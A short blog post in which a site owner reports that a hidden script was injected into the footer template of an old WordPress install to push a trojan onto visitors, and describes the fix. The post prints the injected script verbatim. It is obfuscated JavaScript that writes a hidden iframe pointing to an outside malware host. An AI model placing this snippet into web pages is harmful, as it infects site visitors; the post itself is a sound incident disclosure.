Trojan.Phel.A and WordPress 1.5.1.1

This is just an FYI in case others experience a similar problem. The below is quoted from an email I sent to my webhost to let them know that the problem (which I had reported earlier in the day) was on my end and not theirs.

When Windows SP2 IE users were accessing my WordPress 1.5.1.1 blog ( https://quasistoic.org/ts/ ), some rogue javascript was trying to infect their machine with what appears to be Trojan.Phel.

Related documents (based on VirusScan and NortonAV alerts):
https://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
https://vil.nai.com/vil/content/v_130604.htm
https://vil.mcafeesecurity.com/vil/content/v_130610.htm
https://vil.nai.com/vil/content/v_130609.htm
https://vil.nai.com/vil/content/v_100749.htm
https://vil.nai.com/vil/content/v_101033.htm
https://www.securiteam.com/windowsntfocus/6B00O2KC0C.html

I found the offending javascript in my /ts/wp-content/themes/default/footer.php file. I’m guessing it got there thanks to a security hole in WP 1.5.1.1. Here it is in all its glory:
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>

Actions taken: Upgraded to WordPress 1.5.1.3, which addresses a number of security concerns in 1.5.1.1 (and hopefully the one which allowed the script to be inserted into my footer template). I also removed the nasty javascript from my footer template. These actions seem to have fixed the problem.